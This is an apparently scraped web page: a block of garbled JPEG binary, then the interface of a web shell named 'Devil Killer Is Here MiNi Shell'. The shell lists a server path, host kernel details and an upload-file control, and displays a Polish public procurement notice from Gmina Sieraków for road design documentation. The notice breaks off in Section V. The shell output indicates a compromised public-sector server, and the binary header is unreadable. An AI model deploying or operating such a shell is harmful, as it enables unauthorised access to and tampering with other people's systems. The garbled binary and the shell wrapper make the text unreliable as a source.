JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230407/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230407/0017015601-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Opracowanie wielobranżowej dokumentacji projektowo – kosztorysowej dla potrzeb uzyskania decyzji ZRiD p.t. „Budowa drogi gminnej na Osiedlu Daszyńskiego” w Sierakowie. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA SIERAKÓW</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Referat Infrastruktury i Gospodarki Komunalnej</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 631258922</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. 8 Stycznia 38</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Sieraków</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">64-410</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL417 - Leszczyński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">61/29 53 011; 29 55 860</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">61/29 55 898</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">urzad@sierakow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.sierakow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Opracowanie wielobranżowej dokumentacji projektowo – kosztorysowej dla potrzeb uzyskania decyzji ZRiD p.t. „Budowa drogi gminnej na Osiedlu Daszyńskiego” w Sierakowie. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-0bcd57df-d550-11ed-b70f-ae2d9e28ec7b</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00170156</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-04-07</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00013842/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Opracowanie dokumentacji projektowej dla zadania: &#34;Budowa drogi gminnej na os. Daszynskiego - etap I&#34;</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/sierakow <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. Postępowanie o udzielenie zamówienia prowadzone jest w języku polskim w formie elektronicznej za pośrednictwem platformazakupowa.pl<br/>Link do postępowania dostępny jest na Profilu Nabywcy Zamawiającego:<br/>https://platformazakupowa.pl/pn/sierakow</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Oferta, oświadczenia lub inne dokumenty wymagane przez Zamawiającego składane elektronicznie muszą zostać podpisane elektronicznym kwalifikowanym podpisem lub podpisem zaufanym<br/>lub podpisem osobistym. W procesie składania oferty, na platformie, kwalifikowany podpis elektroniczny lub podpis zaufany lub podpis osobisty Wykonawca składa bezpośrednio na dokumencie, który następnie przesyła do systemu.<br/>Oferta powinna być:<br/>a) sporządzona na podstawie załączników niniejszej SWZ w języku polskim,<br/>b) złożona przy użyciu środków komunikacji elektronicznej tzn. za pośrednictwem platformazakupowa.pl,<br/>c) podpisana kwalifikowanym podpisem elektronicznym lub podpisem zaufanym<br/>lub podpisem osobistym przez osobę/osoby upoważnioną/upoważnione.<br/>Maksymalny rozmiar jednego pliku przesyłanego za pośrednictwem dedykowanych formularzy<br/>do: złożenia, zmiany, wycofania oferty wynosi 150 MB natomiast przy komunikacji wielkość pliku<br/>to maksymalnie 500 MB.<br/>Rozszerzenia plików wykorzystywanych przez Wykonawców powinny być zgodne z Załącznikiem nr 2 do “Rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych”, zwanego dalej Rozporządzeniem KRI.<br/>Zamawiający rekomenduje wykorzystanie formatów: .pdf .doc .docx .xls .xlsx .jpg (.jpeg)<br/>ze szczególnym wskazaniem na .pdf<br/>W celu ewentualnej kompresji danych Zamawiający rekomenduje wykorzystanie jednego z rozszerzeń:<br/>a) .zip<br/>b) .7Z<br/>Wśród rozszerzeń powszechnych a niewystępujących w Rozporządzeniu KRI występują: .rar .gif .bmp .numbers .pages. Dokumenty złożone w takich plikach zostaną uznane za złożone nieskutecznie.<br/>Zamawiający zwraca uwagę na ograniczenia wielkości plików podpisywanych profilem zaufanym, który wynosi maksymalnie 10MB, oraz na ograniczenie wielkości plików podpisywanych w aplikacji eDoApp służącej do składania podpisu osobistego, który wynosi maksymalnie 5MB.<br/>W przypadku stosowania przez wykonawcę kwalifikowanego podpisu elektronicznego:<br/>a) Ze względu na niskie ryzyko naruszenia integralności pliku oraz łatwiejszą weryfikację podpisu zamawiający zaleca, w miarę możliwości, przekonwertowanie plików składających się na ofertę na rozszerzenie .pdf i opatrzenie ich podpisem kwalifikowanym w formacie PAdES.<br/>b) Pliki w innych formatach niż PDF zaleca się opatrzyć podpisem w formacie XAdES o typie zewnętrznym. Wykonawca powinien pamiętać, aby<br/>plik z podpisem przekazywać łącznie z dokumentem podpisywanym.<br/>c) Zamawiający rekomenduje wykorzystanie podpisu z kwalifikowanym znacznikiem czasu.<br/>Zamawiający zaleca aby w przypadku podpisywania pliku przez kilka osób, stosować podpisy tego samego rodzaju. Podpisywanie różnymi rodzajami podpisów np. osobistym i kwalifikowanym może doprowadzić do problemów w weryfikacji plików.<br/>Osobą składającą ofertę powinna być osoba kontaktowa podawana w dokumentacji.<br/>Zamawiający zaleca aby nie wprowadzać jakichkolwiek zmian w plikach po podpisaniu ich podpisem kwalifikowanym. Może to skutkować naruszeniem integralności plików co równoważne będzie z koniecznością odrzucenia oferty.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Administratorem Pani/Pana danych osobowych jest Gmina Sieraków reprezentowana przez Burmistrza Gminy Sieraków z siedzibą Urzędu Gminy Sieraków przy ul. 8 Stycznia 38, 64-410 Sieraków. Kontakt z administratorem jest możliwy także za pomocą adresu mailowego: urzad@sierakow.pl<br/>2. Inspektorem Ochrony Danych Osobowych Pan Krzysztof Pukaczewski, e-mail: abi@sierakow.pl *;<br/>3. Pani/Pana dane osobowe przetwarzane będą w celach związanych z postępowaniem<br/>o udzielenie zamówienia publicznego na podstawie art. 6 ust. 1 lit. c RODO w związku z realizacją obowiązku prawnego ciążącego na administratorze, wynikającego z ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych, a także na podstawie ustawy z dnia 27 sierpnia 2009 r. o finansach publicznych oraz ustawy z dnia 6 września 2001 r. o dostępie do informacji publicznej,<br/>1. Odbiorcami Pani/Pana danych osobowych mogą być:<br/>a) osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania zgodnie<br/>z ustawą z dnia 11 września 2019 r. – Prawo zamówień publicznych,<br/>b) organy władzy publicznej oraz podmioty wykonujące zadania publiczne lub działające na zlecenie organów władzy publicznej, w zakresie i w celach, które wynikają z przepisów powszechnie obowiązującego prawa,<br/>c) inne podmioty, które na podstawie stosownych umów przetwarzają dane osobowe administratora,<br/>2. dane osobowe przechowywane będą przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, w sposób gwarantujący jego nienaruszalność. Jeśli czas trwania umowy przekracza cztery lata, zamawiający przechowuje umowę przez cały czas trwania umowy.<br/>3. dane osobowe nie będą przekazywane do państw trzecich lub organizacji międzynarodowych,<br/>4. prawo żądania od Administratora:<br/>a) dostępu do swoich danych oraz otrzymania ich pierwszej kopii. Administrator dostarcza osobie, której dane dotyczą, kopię danych osobowych, które podlegają przetwarzaniu. Za wszelkie kolejne kopie, o które zwróci się osoba, której dane dotyczą, administrator może pobrać opłatę w rozsądnej wysokości, wynikającej<br/>b) z kosztów administracyjnych.<br/>c) do sprostowania swoich nieprawidłowych danych osobowych lub uzupełnienia swoich niekompletnych danych osobowych. Skorzystanie z tego prawa nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego lub konkursu, ani zmianą postanowień umowy w zakresie niezgodnym z ustawą z dnia 11 września 2019 r. – Prawo zamówień publicznych.<br/>d) do usunięcia danych osobowych wyłącznie na podstawie art. 17 RODO,<br/>e) do ograniczenia przetwarzania danych osobowych na podstawie art. 18 RODO. Prawo do ograniczenia przetwarzania danych osobowych nie ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie zamówienia publicznego lub konkursu,<br/>f) do wniesienia sprzeciwu wobec przetwarzania danych, jeśli nie występują prawnie uzasadnione podstawy przetwarzania i na zasadach opisanych w art. 21 RODO,<br/>g) do przenoszenia danych, zgodnie z art. 20 RODO,<br/>h) prawo do wniesienia skargi do organu nadzorczego,<br/>W celu skorzystania oraz uzyskania informacji dotyczących praw określonych powyżej<br/>(lit. a-g) należy skontaktować się z Administratorem lub z Inspektorem Danych Osobowych.<br/>5. Ma Pani/Pan prawo wniesienia skargi do organu nadzorczego (Urząd Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa),<br/>6. Podanie przez Pani/Pana danych osobowych jest wymogiem ustawowym. Konsekwencje niepodania określonych danych wynikają z ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych.<br/>7. Pani/Pana dane mogą być przetwarzane w sposób zautomatyzowany i nie będą profilowane</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RIK.271.5.2023.I</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiot zamówienia:<br/> Przedmiotem zamówienia jest opracowanie wielobranżowej dokumentacji projektowo – kosztorysowej dla potrzeb uzyskania decyzji zezwalającej na realizację inwestycji drogowej wraz z uzyskaniem stosownych pozwoleń wynikających z przepisów szczegółowych wraz z uzyskaniem decyzji ZRiD z klauzulą wykonalności lub zgody właściwego organu na budowę drogi oraz innych decyzji administracyjnych, uzgodnień i opinii niezbędnych do zrealizowania zadania inwestycyjnego „Budowa drogi gminnej na Osiedlu Daszyńskiego” w Sierakowie.<br/>W obowiązującym planie miejscowym pas drogowy oznaczony symbolem 1KDL łączy drogę wojewódzką oznaczoną symbolem KDG z drogą gminną w sąsiedztwie drogi o symbolu 2KDL(poza opracowaniem). <br/>Orientacyjna długość odcinka drogi do zaprojektowania wynosi ok. 1,6 km. Szerokość pasa drogowego zgodnie z planem miejscowym wynosi 15,0 mb. Przybliżona ilość działek do podziału geodezyjnego 70 sztuk.<br/>Zamówienie swoim zakresem obejmuje: <br/>1. Opracowanie dokumentacji niezbędnych podziałów geodezyjnych,<br/>2. Opracowanie wielobranżowej dokumentacji projektowo – kosztorysowej, w której skład wchodzą : <br/> a) branża drogowa – wraz przepustami/obiektami drogowymi na ciekach wodnych,<br/> b) branża sanitarna - kanalizacja sanitarna i deszczowa,<br/> c) branża wodociągowa,<br/> d) branża elektryczna – oświetlenie,<br/> e) branża telekomunikacyjna – kanał technologiczny,<br/>3. Opracowanie Specyfikacji Technicznych Wykonania i Odbioru Robót, <br/>4. Opracowanie kosztorysów inwestorskich i ofertowych, <br/>5. Opracowanie tymczasowej i stałej organizacji ruchu, <br/>6. Uzyskanie wszystkich wymaganych pozwoleń, uzgodnień, opinii technicznych, ekspertyz i badań<br/> technicznych oraz pokrycie ich kosztów,<br/>7. W razie konieczności, przeprowadzenie konsultacji społecznych, opracowanie sprawozdania z konsultacji społecznych, przygotowanie wszelkich materiałów informacyjnych niezbędnych do przeprowadzenia konsultacji społecznych oraz uczestniczenie we wszelkiego rodzaju spotkaniach, <br/>8. Uzyskanie Decyzji o zezwoleniu na realizację inwestycji drogowej lub decyzji o pozwoleniu na budowę wraz z klauzulą ostateczności. <br/> <br/>Dokumentację projektową należy wykonać zgodnie z wymaganiami Zamawiającego, umową, obowiązującymi przepisami ustawy z dnia 7 lipca 1994 r. Prawo budowlane (t.j. Dz. U. z 2020 r. poz. 1333), a także zgodną z wszelkimi aktami obowiązującymi na terenie kraju normami, wytycznymi oraz zasadami wiedzy technicznej. Dokumentacja projektowa winna być opracowana przez uprawnionych projektantów. Należy przyjąć rozwiązania zapewniające prostą, niezawodną eksploatację Przedmiotu Zamówienia w długim okresie czasu.<br/><br/>Zakresem opracowania należy objąć obszar pasa drogowego oznaczonego symbolem1KDL zgodnie z UCHWAŁĄ NR XXXIV/245/2021 RADY MIEJSKIEJ W SIERAKOWIE z dnia 28 września 2021 r. <br/>w sprawie miejscowego planu zagospodarowania przestrzennego dla zachodniej części miasta Sieraków– zgodnie z Załącznikiem Nr 4 do SWZ.<br/>Szczegółowy Opis Przedmiotu Zamówienia przedstawiono w Załączniku Nr 5 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71220000-6 - Usługi projektowania architektonicznego</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71320000-7 - Usługi inżynieryjne w zakresie projektowania</p> <p class="mb-0">71322000-1 - Usługi inżynierii projektowej w zakresie inżynierii lądowej i wodnej</p> <p class="mb-0">71322200-3 - Usługi projektowania rurociągów</p> <p class="mb-0">71323100-9 - Usługi projektowania systemów zasilania energią elektryczną</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">300 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Najkorzystniejszą ofertą będzie oferta, która przedstawia najkorzystniejszy bilans ceny i innych kryteriów odnoszących się do przedmiotu zamówienia publicznego. <br/>2.	Ocenie ofert podlegają tylko oferty niepodlegające odrzuceniu.<br/>3.	Kryterium oceny ofert i jego znaczenie oraz opis sposobu oceny ofert:<br/>3.1 kryterium „Cena” (A):<br/>a)	znaczenie kryterium – 60,00%<br/>b)	opis sposobu oceny ofert według kryterium „Ceny”: <br/>(Cmin/Cof) x 100 pkt.<br/>gdzie:<br/>Cmin = najniższa cena w złotych brutto za wykonanie zamówienia spośród złożonych ofert<br/>Cof = cena w złotych brutto za wykonanie zamówienia podana w ofercie badanej<br/><br/>3.2	kryterium „Okres rękojmi” (B):<br/>a)	znaczenie kryterium – 20,00%<br/>b)	opis sposobu oceny ofert według kryterium „okres rękojmi”: <br/>W zależności od zadeklarowanego w formularzu ofertowym okresu rękojmi oferta otrzyma następującą ilość punktów (B):<br/> 1. okres rękojmi 36 miesięcy - 80 punktów<br/> 2. okres rękojmi 48 miesięcy - 90 punktów<br/> 3. okres rękojmi 60 miesięcy - 100 punktów<br/> UWAGA! <br/>Zamawiający określa minimalną oraz maksymalną długość okresu rękojmi.<br/>W przypadku błędnego wskazania przez Wykonawcę okresu rękojmi, Zamawiający przyjmie, że Wykonawca oferuje okres rękojmi 60 miesięcy (maksymalny).<br/><br/>3.3	kryterium „Doświadczenie koordynatora projektu” (C):<br/>a)	znaczenie kryterium – 20,00%<br/>b)	opis sposobu oceny ofert według kryterium „doświadczenie koordynatora projektu”: <br/>Punkty za kryterium doświadczenie koordynatora projektu zostaną obliczone według<br/> poniższego opisu:<br/>a)	jeżeli Wykonawca wykaże, że osoba posiadająca uprawnienia budowlane do projektowania <br/>w specjalności inżynieryjnej drogowej opracowała dokumentację projektową, która uzyskała ostateczną decyzję o zezwoleniu na realizację inwestycji drogowej zgodnie z ustawą z dnia 10 kwietnia 2003 r. o szczególnych zasadach realizacji inwestycji drogowych w zakresie dróg publicznych, obejmującą budowę/rozbudowę/przebudowę drogi o długości minimum<br/> 500 mb – otrzyma za: <br/> 1. jedną dokumentację projektową - 80 punktów<br/> 2. dwie dokumentacje projektowe - 90 punktów<br/> 3. trzy dokumentacje projektowe - 100 punktów<br/>Zamawiający określa wymóg minimalnego doświadczenia koordynatora projektu poprzez opracowanie minimum jednej dokumentacji projektowej zgodnie z ppkt. a).<br/>W przypadku braku wskazania przez Wykonawcę doświadczenia koordynatora projektu zgodnego z SWZ na formularzu ofertowym, Zamawiający przyjmie, że Wykonawca nie spełnia warunków udziału w postępowaniu, a oferta wykonawcy zostanie odrzucona .<br/><br/>Łączna ilość punktów przyznana ofercie - W<br/> W = A x 0,6 + B x 0,2 + C x 0,2<br/>Punkty zostaną zaokrąglone do dwóch miejsc po przecinku.<br/>Wynik - oferta, która przedstawia najkorzystniejszy bilans (maksymalna liczba przyznanych punktów w oparciu o ustalone kryteria) zostanie uznana za najkorzystniejszą, pozostałe oferty zostaną sklasyfikowane zgodnie z ilością uzyskanych punktów. Realizacja zamówienia zostanie powierzona Wykonawcy, którego oferta uzyska najwyższą ilość punktów. Jeżeli oferty uzyskają taką samą liczbę punktów, za najkorzystniejszą zostanie uznana oferta z najniższą ceną.<br/><br/>4.	W toku badania i oceny ofert Zamawiający może żądać od Wykonawcy wyjaśnień dotyczących treści złożonej oferty, w tym zaoferowanej ceny.<br/>5.	Zamawiający udzieli zamówienia Wykonawcy, który spełnia wymagane warunki oraz którego oferta odpowiada zasadom określonym w ustawie Prawo zamówień publicznych, spełnia wymagania określone w niniejszej specyfikacji warunków zamówienia i uzyska najwyższą ilość punktów <br/>w oparciu o wyżej podane kryteria wyboru. Maksymalna liczba punktów jaką może uzyskać Wykonawca wynosi – 100. Obliczenia dokonywane będą z dokładnością do dwóch miejsc <br/>po przecinku, zgodnie z zasadami arytmetyki. <br/>6.	Zamawiający nie będzie przeprowadzał aukcji elektronicznej.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie koordynatora projektu</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na zasadach określonych w 